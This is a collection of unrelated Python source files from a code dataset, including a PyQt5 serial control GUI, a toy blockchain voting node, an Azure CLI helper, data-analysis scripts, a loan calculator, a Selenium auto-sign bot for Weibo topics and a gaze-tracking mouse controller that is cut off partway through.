self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(0, 360) # 设置范围\n self.dial.setWrapping(True) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-10)\n # 设置最大值\n self.verticalSlider.setMaximum(90)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n # 功放、伺服关闭、断电按钮动作\n def button_active_else(self):\n button_txt = self.sender()\n # if button_txt.text() == '功放上电' or button_txt.text() == '功放断电' or button_txt.text() == '锁定':\n # self.active_button = button_txt.text()\n # self.data_edit1.setEnabled(False)\n # self.data_edit2.setEnabled(False)\n if button_txt.text() == '功放上电':\n self.data_edit1.clear()\n 
self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.POWER_ON)\n self.ser.write(hex_command)\n self.show_send.append(self.POWER_ON)\n # self.pushButton_on.clicked.connect(self.str_data_send)\n elif button_txt.text() == '功放断电':\n self.data_edit1.clear()\n self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.POWER_OFF)\n self.ser.write(hex_command)\n self.show_send.append(self.POWER_OFF)\n # self.pushButton_off.clicked.connect(self.str_data_send)\n elif button_txt.text() == '锁定':\n self.data_edit1.clear()\n self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.LOCK)\n self.ser.write(hex_command)\n self.show_send.append(self.LOCK)\n # self.pushButton_lock.clicked.connect(self.str_data_send)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myshow = Pyqt5Serial()\n myshow.showMaximized() #窗口最大化显示\n sys.exit(app.exec_())\n\n# if __name__ == '__main__':\n# app = QApplication(sys.argv)\n# mainWindow = QMainWindow()\n# ui = Pro.Ui_MainWindow()\n# ui.setupUi(mainWindow)\n# mainWindow.show()\n# sys.exit(app.exec_())\n\n\n# def button_state(self):\n# radiobutton = self.sender()\n# if radiobutton.text() =='速度运行模式':\n# if radiobutton.isChecked() == True:\n# print('<' + radiobutton.text() + '>被选中')\n# # 发送数据按钮\n# print('等待发送速度运行模式下的数据:' )\n# self.btn_send.clicked.connect(self.data_send)\n# else:\n# print('<' + radiobutton.text() + '>取消选中')\n# if radiobutton.text() == '位置运行模式':\n# if radiobutton.isChecked() == True:\n# print('<' + radiobutton.text() + '>被选中')\n# print('等待发送位置运行模式下的数据:')\n# self.btn_send.clicked.connect(self.data_send)\n# else:\n# print('<' + radiobutton.text() + '>取消选中')\n\n\n# print(-int(recv3_er[1:],2))\n# recv3_er_new = reverse(recv3_er[1:])\n# recv3_er_add = add_1(recv3_er_new)\n#\n# self.lineEdit_3.setText(str(round(-int(recv3_er_add[1:],2)/14800, 2)))\n# bin(int('0x11', 16)) 十六进制数转二进制数 输出字符串类型\n# print(-int(recv3_er_add[1:],2))\n# print('1111111111111111111111')\n","sub_path":"testPro.py","file_name":"testPro.py","file_ext":"py","file_size_in_byte":33640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163674515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport Crypto\nimport Crypto.Random\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nimport hashlib as hasher\nimport binascii\nfrom collections import OrderedDict\nfrom random import randint\nimport time\nfrom tqdm import *\nimport os\nimport sys\nimport subprocess as sp\nimport getpass\nimport pyperclip\n\nimport ast # string representation of a dict to dict\n\nimport traceback # Para errores\n\n# Creación del archivo pending asociado al nodo\nid_nodo=int(sys.argv[1])\nname_pending = 'pending_' + str(id_nodo) + '.dat'\nfpending = open(name_pending, 'w').close()\n\n# Variables\nindex=0\nnew_voto = 0\naux_contador = 0\nt_pending = 0.2\n\naux = sp.call('clear',shell=True) # Limpiamos la 
shell\n\ndef print_aux():\n\t\"\"\"\n\t\tFunción auxiliar para mostrar separadores por consola.\n\t\"\"\"\n\n\tprint(50*\"=\")\n\ndef print_aux2():\n\t\"\"\"\n\t\tFunción auxiliar para mostrar separadores por consola.\n\t\"\"\"\n\n\tprint(50*\"-\")\n\ndef espera(secs):\n\t\"\"\"\n\t\tFunción auxiliar para mostrar barra de espera por consola.\n\t\"\"\"\n\n\tprint_aux2()\n\tfor i in tqdm(range(secs)):\n\t\ttime.sleep(1)\n\nclass Block:\n\t\"\"\"\n\t\tClase de los bloques que conforman la cadena de bloques (Blockchain).\n\t\"\"\"\n\n\tdef __init__(self, index, timestamp, transaction, node, previous_hash):\n\t\tself.index = index\n\t\tself.timestamp = timestamp\n\t\tself.transaction = transaction\n\t\tself.node = node\n\t\tself.previous_hash = previous_hash\n\t\tself.hash = self.hash_block()\n\n\tdef hash_block(self):\n\t\t# Crea el hash SHA256 del bloque\n\t\taux = (str(self.index) + str(self.timestamp) + str(self.transaction) + str(self.node) + str(self.previous_hash))\n\t\tblock_string = aux.encode()\n\t\treturn hasher.sha256(block_string).hexdigest()\n\nclass Transaction:\n\t\"\"\"\n\t\tClase de las transacciones.\n\t\"\"\"\n\n\tdef __init__(self, sender_address, recipient_address, value):\n\t\tself.sender_address = sender_address\n\t\tself.recipient_address = recipient_address\n\t\tself.value = value\n\n\tdef __getattr__(self, attr):\n \treturn self.data[attr]\n\n\tdef to_dict(self):\n\t\treturn ({'sender_address': str(self.sender_address),\n 'recipient_address': str(self.recipient_address),\n 'value': str(self.value)})\n\nclass Signature:\n\t\"\"\"\n\t\tClase de la Firma.\n\t\"\"\"\n\n\tdef __init__(self, sender_private_key, transaction):\n\t\tself.sender_private_key = sender_private_key\n\t\tself.transaction = transaction.to_dict()\n\n\tdef __getattr__(self, attr):\n \treturn self.data[attr]\n\n\tdef sign_transaction(self):\n\t\t# Firma transacción con la clave privada\n\t\tprivate_key = RSA.importKey(binascii.unhexlify(self.sender_private_key))\n\t\tsigner = PKCS1_v1_5.new(private_key)\n\t\th = SHA.new(str(self.transaction).encode('utf8'))\n\t\treturn binascii.hexlify(signer.sign(h)).decode('ascii')\n\ndef verify_transaction_signature(sender_address, signature, transaction):\n\t\"\"\"\n\t\tVerifica que la Firma se corresponde con una transacción firmada\n\t\tcon la clave pública del emisor.\n\t\"\"\"\n\n\tthis_public_key = RSA.importKey(binascii.unhexlify(sender_address))\n\tthis_verifier = PKCS1_v1_5.new(this_public_key)\n\tthis_h = SHA.new(str(transaction).encode('utf8'))\n\n\treturn this_verifier.verify(this_h, binascii.unhexlify(signature))\n\ndef add_block(blockchain,block):\n\t\"\"\"\n\t\tAñade un bloque al fichero blockchain.dat y a la variable local \"blockchain\".\n\t\"\"\"\n\n\tblockchain.append(block)\t\n\tfblockchain = open(\"blockchain.dat\",\"a\")\n\tfblockchain.write(block.index + \"|\" + block.timestamp + \"|\" + block.transaction['sender_address'] + \",\" + block.transaction['recipient_address'] + \",\" + str(block.transaction['value']) + \"|\" + str(block.node) + \"|\" + block.previous_hash + \"|\" + block.hash + '\\n')\n\tfblockchain.close()\n\ndef check_votante(blockchain,votante):\n\t\"\"\"\n\t\tComprueba si un votante se encuentra en Blockchain.\n\t\"\"\"\n\n\tfor i in range(0, len(blockchain)):\n\t\t# Check votante\n\t\tif votante == blockchain[i].transaction['sender_address'].strip():\n\t\t\tTrue\n\t\t\tbreak\n\t\t\n\treturn False\n\n# Leemos la lista de Candidatos\nfcandidatos = open('candidatos.dat','r')\naux_str = fcandidatos.readlines()\ncandidatos = 
map(str.strip, aux_str)\nfcandidatos.close()\n\nvotos_candidatos=[0] * len(candidatos) # Para conteo de candidatos\n\n# Limpiamos blockchain\n#fblockchain = open(\"blockchain.dat\",\"w\").close()\nblockchain=[]\n\n# Si no hay genesis block, lo añadiomos\nfblockchain = open('blockchain.dat', 'r')\naux_str = fblockchain.readlines()\nblockchain_file = map(str.strip, aux_str)\nfblockchain.close()\n\nif len(blockchain_file) == 0:\n\tgen_block = Block(\"0\",time.strftime(\"%d/%m/%Y %H:%M:%S\"),Transaction(\"Genesis block\",\"-\",\"1\").to_dict(),\"0\",\"0\")\n\tadd_block(blockchain,gen_block)\n\nloop = True\nwhile loop:\n\ttry:\n\t\t# Detectamos cuando se añade algo al archivo pending (se comprueba que el archivo pending no está vacío)\n\t\tif not(os.stat(name_pending).st_size == 0):\t\t\n\n\t\t\t# Leemos pending (se lee así para quitar el \\n todas las lineas)\n\t\t\twith open(name_pending) as f:\n\t\t\t\tpending = f.readlines()\n\t\t\t\tpending = [x.strip() for x in pending]\n\n\t\t\tnext_vote = pending[0]\n\n\t\t\t# Cogemos el voto nuevo\n\t\t\tvote_time,pub_key_1,aux_t1,s1=next_vote.split(\"|\")\n\t\t\tt1 = ast.literal_eval(aux_t1)\n\t\t\tnew_voto = 1\n\n\t\t\twhile new_voto == 1:\n\t\t\t\taux = sp.call('clear',shell=True)\n\t\t\t\tprint_aux()\n\t\t\t\tprint(\"[!] Se ha encontrado una transacción pendiente\")\n\t\t\t\tprint_aux2()\n\t\t\t\tprint(\"[+] Fecha: \" + str(vote_time))\n\t\t\t\tprint(\"\\n- Sender: \" + str(t1['sender_address'][:30]) + \"...\")\n\t\t\t\tprint(\"\\n- Receiver: \" + str(t1['recipient_address'][:30]) + \"...\")\n\n\t\t\t\t# Verificación de transacción\n\t\t\t\tverification = verify_transaction_signature(pub_key_1,s1,t1)\n\t\t\t\tprint(\"\\n- Verificación de transacción: \" + str(verification))\n\n\t\t\t\t# Evitar voto duplicado\n\t\t\t\tvoto_duplicado = check_votante(blockchain,t1['sender_address'])\n\t\t\t\tprint(\"\\n- ¿El votante ha votado ya?: \" + str(voto_duplicado))\n\t\t\t\tprint_aux2()\n\t\t\t\t\n\t\t\t\tif verification:\n\t\t\t\t\tfflag = open('flag.dat', 'r')\n\t\t\t\t\taux_flag = fflag.readlines()\n\t\t\t\t\tflag = map(str.strip, aux_flag)\n\t\t\t\t\tfflag.close()\n\n\t\t\t\t\t# Si Blockchain no está siendo usado por otro nodo\n\t\t\t\t\tif len(flag) == 1:\n\t\t\t\t\t\tif flag[0] == '0':\n\t\t\t\t\t\t\t# Bloqueo del fichero blockchain.dat\n\t\t\t\t\t\t\tfflag = open('flag.dat', 'w')\n\t\t\t\t\t\t\tfflag.write(\"1\")\n\t\t\t\t\t\t\tfflag.close()\n\n\t\t\t\t\t\t\t# Leemos blockchain.dat\n\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 'r')\n\t\t\t\t\t\t\taux_str = fblockchain.readlines()\n\t\t\t\t\t\t\tblockchain_file = map(str.strip, aux_str)\n\t\t\t\t\t\t\tfblockchain.close()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 'w').close()\n\t\t\t\t\t\t\tblockchain=[]\n\n\t\t\t\t\t\t\t# Lo copiamos en blockchain local (Actualizamos blockchain local)\n\t\t\t\t\t\t\tif len(blockchain_file) != 0:\n\t\t\t\t\t\t\t\tfor i in range(0, len(blockchain_file)):\n\t\t\t\t\t\t\t\t\taux_index,aux_timestamp,aux_aux_transaction,aux_node,aux_prev_hash,aux_actual_hash=blockchain_file[i].split(\"|\")\n\t\t\t\t\t\t\t\t\taux_transaction=(aux_aux_transaction.split(\",\"))\n\n\t\t\t\t\t\t\t\t\taux_block = Block(aux_index,aux_timestamp,Transaction(aux_transaction[0],aux_transaction[1],aux_transaction[2]).to_dict(),aux_node,aux_prev_hash)\n\t\t\t\t\t\t\t\t\tadd_block(blockchain,aux_block)\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# Comprobamos que no se ha añadido nada mientras tanto\n\t\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 
'r')\n\t\t\t\t\t\t\t\taux_str = fblockchain.readlines()\n\t\t\t\t\t\t\t\tblockchain_file2 = map(str.strip, aux_str)\n\t\t\t\t\t\t\t\tfblockchain.close()\n\n\t\t\t\t\t\t\t\t# Si no se ha añadido nada mientras tanto, podemos añadir el nuevo bloque a blockchain.dat\n\t\t\t\t\t\t\t\tif blockchain_file == blockchain_file2:\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tactual_block = Block(str(len(blockchain_file)),vote_time,t1,str(id_nodo),blockchain[-1].hash) # Se crea el bloque\n\t\t\t\t\t\t\t\t\tadd_block(blockchain,actual_block)\t# Se añade el bloque a la cadena de bloques\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t# Quitamos el voto de pending\n\t\t\t\t\t\t\t\t\twith open(name_pending, 'r') as fin:\n\t\t\t\t\t\t\t\t\t\tdata = fin.read().splitlines(True)\n\t\t\t\t\t\t\t\t\twith open(name_pending, 'w') as fout:\n\t\t\t\t\t\t\t\t\t\tfout.writelines(data[1:])\n\t\t\t\t\t\t\t\t\tnew_voto = 0\n\t\t\t\t\t\t\t\t\taux_contador += 1\n\t\t\t\t\t\t\t\t\tprint(\"[+] Ha sido incluida en Blockchain\")\n\n\t\t\t\t\t\t\t\t\t# Hacemos conteo de candidatos\n\t\t\t\t\t\t\t\t\tif (t1['recipient_address'] == candidatos[0]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[0] += 1\n\t\t\t\t\t\t\t\t\telif (t1['recipient_address'] == candidatos[1]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[1] += 1\n\t\t\t\t\t\t\t\t\telif (t1['recipient_address'] == candidatos[2]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[2] += 1\n\t\t\t\t\t\t\t\t\telse: # Voto nulo\n\t\t\t\t\t\t\t\t\t\tvotos_nulos +=1\n\t\t\n\t\t\t\t\t\t\t# Desbloqueamos blockchain.dat\n\t\t\t\t\t\t\tfflag = open('flag.dat', 'w')\n\t\t\t\t\t\t\tfflag.write(\"0\")\n\t\t\t\t\t\t\tfflag.close()\n\n\t\t\t\t\telse:\t# Se ha detectado flag == 1.\n\t\t\t\t\t\tprint(\"[+] Blockchain utilizada por otro nodo. No se ha incluído transacción todavía\")\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[!] NO la incluimos en Blockchain\")\n\t\t\t\tprint_aux()\n\t\t\t\ttime.sleep(t_pending)\n\t\telse:\n\t\t\t# Se imprimen los votos a los distintos candidatos.\n\t\t\taux = sp.call('clear',shell=True)\n\t\t\tprint(20*\"=\" + \" [Nodo \" + str(id_nodo) + \"] \"+ 20*\"=\")\n\t\t\tprint(\"Votos Candidato 1: \" + str(votos_candidatos[0]))\n\t\t\tprint(\"Votos Candidato 2: \" + str(votos_candidatos[1]))\n\t\t\tprint(\"Votos Candidato 3: \" + str(votos_candidatos[2]))\n\n\t\t\tprint_aux2()\n\t\t\t\n\t\t\t# Mientras que no haya votos pendientes.\n\t\t\twhile (os.stat(name_pending).st_size == 0):\n\t\t\t\tfor i in [\"No hay votos pendientes [|]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [/]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [-]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [\\\\]. Votos totales: \" + str(aux_contador)]:\n\t\t\t\t\tsys.stdout.write(\"\\r\" + i)\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\ttime.sleep(0.1)\n\t\t\tprint(\"\\n\")\n\texcept KeyboardInterrupt:\n\t\tprint('\\nControl + C pulsado. Adios.')\n\t\tbreak\n\texcept Exception as e:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, exc_obj, fname, exc_tb.tb_lineno)\n\t\t#traceback.print_exc()\n\t\tbreak\n","sub_path":"nodo.py","file_name":"nodo.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197707145","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# pylint: disable=unused-argument, no-self-use, line-too-long, protected-access, too-few-public-methods\nfrom ._util import import_aaz_by_profile\n\n\n_NetWork = import_aaz_by_profile(\"network\")\n\n\nclass UsagesList(_NetWork.ListUsages):\n    def _output(self, *args, **kwargs):\n        result = self.deserialize_output(self.ctx.vars.instance.value, client_flatten=True)\n        next_link = self.deserialize_output(self.ctx.vars.instance.next_link)\n        result = list(result)\n        for item in result:\n            item['currentValue'] = str(item['currentValue'])\n            item['limit'] = str(item['limit'])\n            item['localName'] = item['name']['localizedValue']\n        return result, next_link\n# endregion\n","sub_path":"src/azure-cli/azure/cli/command_modules/network/azure_stack/profile_2018_03_01_hybrid/operations/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47602899","text":"import os\nimport glob\nimport pandas as pd\n\n#a = os.path.join('/Users/I522537/Documents/pluralsight-projects-Python-Baseball-83868ef/', 'games', '*.EVE')\n\n#game_files = glob.glob(os.path.join('/Users/I522537/Documents/pluralsight-projects-Python-Baseball-83868ef/', 'games', '*.EVE'))\ngame_files = glob.glob(os.path.join(os.getcwd(), 'games', '*.EVE'))\ngame_files.sort()\n#print(game_files)\n\ngame_frames = []\nfor game_file in game_files:\n    game_frame = pd.read_csv(game_file, names=['type', 'multi2', 'multi3', 'multi4', 'multi5', 'multi6', 'event'])\n    game_frames.append(game_frame)\n\ngames = pd.concat(game_frames)\n#games = games[~games.index.duplicated()]\n#print(games.head(100))\n#print(games.shape)\ngames.loc[games['multi5'] == '??', ['multi5']] = ''\n\nidentifiers = games['multi2'].str.extract(r'(.LS(\\d{4})\\d{5})')\n#print(identifiers.head())\n\nidentifiers = identifiers.fillna(method='ffill')\nidentifiers.columns = ['game_id', 'year']\n#print(identifiers.head())\n\ngames = pd.concat([games, identifiers], sort=False, axis=1)\n#print(games.head())\ngames = games.fillna(' ')\n#print(pd.unique(games['type'].values.ravel()))\ngames.loc[:, 'type'] = pd.Categorical(games.loc[:, 'type'])\nprint(games.head())\n","sub_path":"stats/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519705472","text":"def credit_account(money, period, rate):\n    # Monthly annuity payment formula: S = x * p**n * (p - 1) / (p**n - 1)\n    money_per_month = money * (rate / 100 + 1) ** period \\\n                      * (rate / 100) / ((rate / 100 + 1) ** period - 1)\n    # Total amount paid over the whole life of the loan\n    result = round(money_per_month * period)\n    return result\n\ndef main():\n    rate = 10\n    money = 100000\n    period = 12\n\n    print(\"Account parameters:\")\n    print(\"Loan amount:\", money, \"rubles\")\n    print(\"Rate:\", rate, \"%\")\n    print(\"Repayment period:\", period, \"months\")\n    print(\"Total repayment on the loan:\", credit_account(money, period, rate), \"rubles\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503614026","text":"#!/usr/bin/env 
python\n# encoding: utf-8\n\nfrom functools import reduce  # reduce is a builtin on Python 2 but must be imported on Python 3\n\n\nclass Solution(object):\n    def maxProduct(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        if not nums:\n            return 0\n\n        if len(nums) == 1 and nums[0] < 0:\n            return nums[0]\n\n        # indices of the negative numbers seen so far\n        foo = []\n\n        def x(a, b):\n            return a * b\n\n        def reduce_plus(nums):\n            if not nums:\n                return 0\n\n            return reduce(x, nums)\n\n        # max product of a zero-free segment, given the indices of its negative elements\n        def bar(nums, foo):\n            if not nums:\n                return 0\n\n            if len(foo) % 2 == 0:\n                return reduce_plus(nums)\n\n            left = foo[0]\n            right = foo[-1]\n\n            if left == right or right - left == 1:\n                return max(reduce_plus(nums[:left]), reduce_plus(nums[left + 1:]))\n\n            mid_mul = reduce_plus(nums[left + 1: right])\n\n            left_mul = reduce_plus(nums[:left + 1])\n            right_mul = reduce_plus(nums[right:])\n\n            if left_mul < right_mul:\n                return mid_mul * left_mul\n            else:\n                return mid_mul * right_mul\n\n        for index, num in enumerate(nums):\n            if num == 0:\n                # split at zeros and solve each zero-free segment independently\n                left = bar(nums[:index], foo)\n                return max(left, self.maxProduct(nums[index + 1:]))\n\n            if num < 0:\n                foo.append(index)\n\n        return bar(nums, foo)\n\n\nif __name__ == '__main__':\n    s = Solution()\n\n    # nums = [2, 3, -2, 4]\n    # nums = [-2, 0, -1]\n    nums = [-2]\n\n    result = s.maxProduct(nums)\n\n    print(result)\n","sub_path":"leetcode/152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476644314","text":"from libs.Login import *\nfrom libs.path_url_lib import *\nfrom libs.InfoLog import *\n\n\nclass AutoSign(object):\n    def __init__(self, driver):\n        self.driver = driver\n        self.wait = WebDriverWait(self.driver, 30, 0.5) # 等待时间\n        self.driver.set_window_size(1000, 820)\n\n    def to_page(self, url):\n        self.driver.get(url)\n\n    def doQuery(self, url):\n        self.to_page(url)\n\n        if self.driver.current_url != url:\n            return False\n\n        title = self.wait.until(EC.presence_of_element_located((By.XPATH, title_path))).text\n\n        # 在进入李子璇超话页时 检测是否是假登录\n        if title == '李子璇':\n            # 判断 class name 如果 含有login则返回 problem\n            LogInfo(u'INFO:--- 正在判断是否假登录 ---')\n            gn_login = self.wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"pl_common_top\"]/div/div'\n                                                                                '/div[3]/div[2]')))\n            classname = gn_login.get_attribute('class')\n            if 'login' in classname:\n                LogInfo('DEAD THREAD INFO: --!!! 
假登录出现 !!!--')\n return 'problem'\n\n focus_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, focus_btn_path)))\n info = focus_btn.text\n\n try:\n self.wait.until(EC.presence_of_element_located((By.XPATH, music_path)))\n except TimeoutException as gt:\n self.driver.refresh()\n self.doQuery(url)\n\n # 如果是已关注,则点击右边的签到按钮:\n if info == 'Y 已关注g':\n try:\n sign_btn = self.driver.find_element_by_xpath(sign_btn_poth)\n if sign_btn.text != '已关注':\n ActionChains(self.driver).move_to_element(sign_btn)\n sign_btn.click()\n time.sleep(3)\n LogInfo('INFO: [{}] 签到完成....'.format(title))\n return True\n\n elif sign_btn.text == '已签到':\n pass\n except NoSuchElementException:\n LogInfo(u'没有找到签到按钮,准备刷新一下...')\n self.driver.refresh()\n self.doQuery(url)\n except StaleElementReferenceException:\n LogInfo(u'没有找到签到按钮,准备刷新一下...')\n self.driver.refresh()\n self.doQuery(url)\n\n # 如果还未关注,则点击关注,再签到\n elif info == '+关注':\n focus_btn.click()\n time.sleep(8)\n try:\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n time.sleep(3)\n LogInfo('INFO: [{}] 签到完成....'.format(title))\n\n return True\n except StaleElementReferenceException as s:\n pass\n except TimeoutException as e:\n LogInfo(u'ERROR[处理中]:出现超时...')\n self.driver.refresh()\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n except ElementNotVisibleException as w:\n LogInfo(u'ERROR[处理中]:网页元素不可见...')\n self.driver.refresh()\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n\n time.sleep(3)\n\n def run(self):\n url_set = [mainst_url, wtd_url, zdz_url, cdb_url, xkl_url, tdy_url, twrj_url, pty_url]\n index = 0\n cnt = 0\n while index <= 7:\n try:\n if cnt <= 3:\n query_ret = self.doQuery(url_set[index])\n if query_ret == 'problem':\n return 'problem', self.driver\n elif query_ret:\n # 如果 ret 是 True\n index += 1\n cnt = 0\n else:\n # 如果失败了,暂时不切下一个超话,继续重新尝试签到\n cnt += 1\n continue\n\n except ElementNotVisibleException as v:\n LogInfo(u'ERROR[处理中]: 尝试点击签到按钮超时,正在刷新重试...')\n cnt += 1\n continue\n except TimeoutException as w:\n LogInfo(u'ERROR[处理中]: 尝试点击签到按钮超时,正在刷新重试...')\n cnt += 1\n continue\n\n return 'peace', self.driver\n","sub_path":"libs/Auto_Sign.py","file_name":"Auto_Sign.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418613848","text":"import pandas as pd, argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\npsr = argparse.ArgumentParser()\npsr.add_argument('-1', dest=\"ch1\", help=\"input ch1 xlsx file\")\n#psr.add_argument('-2', dest=\"ch2\", help=\"input ch2 xlsx file\")\n#psr.add_argument('-m', dest=\"math\", help=\"input math xlsx file\")\n#psr.add_argument('-o', dest=\"output\", help=\"output txt file\")\nargs = psr.parse_args()\nargs.ch2 = args.ch1 + '_Ch2.csv'\nprefix = args.ch1.split('/')[-1]\ntmpch1 = args.ch1\nargs.math = args.ch1 + '_Math1.csv'\nargs.output = args.ch1 + '_Voltage.png'\nargs.ch1 = args.ch1 + '_Ch1.csv'\n# , skiprows=range(6)\n#ch1 = pd.read_csv(args.ch1, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nch2 = pd.read_csv(args.ch2, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nmath = pd.read_csv(args.math, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nchLength = ch2.shape[0]\nnoisemean = ch2['voltage'][:1500].mean()\nnoisestd = 
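Auto_Sign.run() above wraps doQuery() in a bounded retry loop (its Chinese log strings report a detected fake login and refresh-and-retry steps). The pattern in miniature, assuming Selenium 3 where ElementNotVisibleException is still exported; sign_all, do_query and MAX_RETRIES are illustrative names, not from the source:

from selenium.common.exceptions import TimeoutException, ElementNotVisibleException

MAX_RETRIES = 3

def sign_all(urls, do_query):
    for url in urls:
        for _ in range(MAX_RETRIES + 1):
            try:
                if do_query(url):
                    break  # this topic is signed; move on to the next URL
            except (TimeoutException, ElementNotVisibleException):
                continue  # mirrors the original refresh-and-retry handlers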
ch2['voltage'][:1500].std()\nch2['volNoNoise'] = ch2['voltage']-noisemean\nprint('noise mean:{};noise std:{}'.format(noisemean, noisestd))\nch2['sumvol']=ch2['volNoNoise'].cumsum()\n\nfig, ax = plt.subplots()\n#ax.plot(ch1['time'], ch1['sumvol'], label='ch1')\nax.plot(ch2['time'], ch2['voltage'], label='ch2')\nax.plot(math['time'], math['voltage'], label='math')\nax.set_title('{} voltage'.format(prefix))\nax.legend()\nfig.savefig(args.output)\nplt.close()\n\nfig, ax = plt.subplots()\n# time interval 1e-10,f interval 1e10/5000\nax.plot(np.arange(chLength)/500, np.abs(np.fft.fft(ch2['sumvol'])), label='ch2 fft')\nax.set_xlabel('f/GHz')\nax2 = ax.twiny()\ncolor = 'tab:red'\nax2.set_xlabel('f/GHz', color=color)\nax2.plot(np.arange(500)/500, np.abs(np.fft.fft(ch2['sumvol'])[0:500]), label='ch1 fft 0-1GHz', color=color)\nax2.tick_params(axis='x', labelcolor=color)\nax2.legend(loc=9)\nax.set_title('{} fft frequency'.format(prefix))\nax.legend()\nfig.savefig(tmpch1+'_fft.png')\nplt.close()\n#print(ch)","sub_path":"ginter.py","file_name":"ginter.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202180525","text":"import argparse\nimport cv2\nimport logging\nfrom input_feeder import InputFeeder\nfrom mouse_controller import MouseController\nfrom face_detection import Face_Detection\nfrom head_pose_estimation import Head_Pose_Estimation\nfrom facial_landmarks_detection import Facial_Landmarks_Detection\nfrom gaze_estimation import Gaze_Estimation\nfrom debug_utils import draw_axes, draw_gaze_vector\n\n\ndef get_args():\n '''\n Gets the arguments from the command line.\n '''\n parser = argparse.ArgumentParser(\"Run inference on an input video\")\n # -- Create the descriptions for the commands\n device = \"The device name, if not 'CPU'\"\n extension = \"CPU extension if any\"\n file = \"Input file\"\n setDebug = \"set debug\"\n\n\n # -- Add required and optional groups\n parser._action_groups.pop()\n required = parser.add_argument_group('required arguments')\n optional = parser.add_argument_group('optional arguments')\n\n # -- Create the arguments\n optional.add_argument(\"-i\", help=file, default='../bin/demo.mp4')\n optional.add_argument(\"-d\", help=device, default='CPU')\n optional.add_argument(\"-e\", help=extension)\n optional.add_argument(\"-s\", help=setDebug, default=0)\n args = parser.parse_args()\n\n return args\n\ndef get_face_coordinates(image, width, height):\n processed_image = fd_model.preprocess_input(image)\n fdm_out = fd_model.predict(processed_image)\n fdm_preprocessed_out = 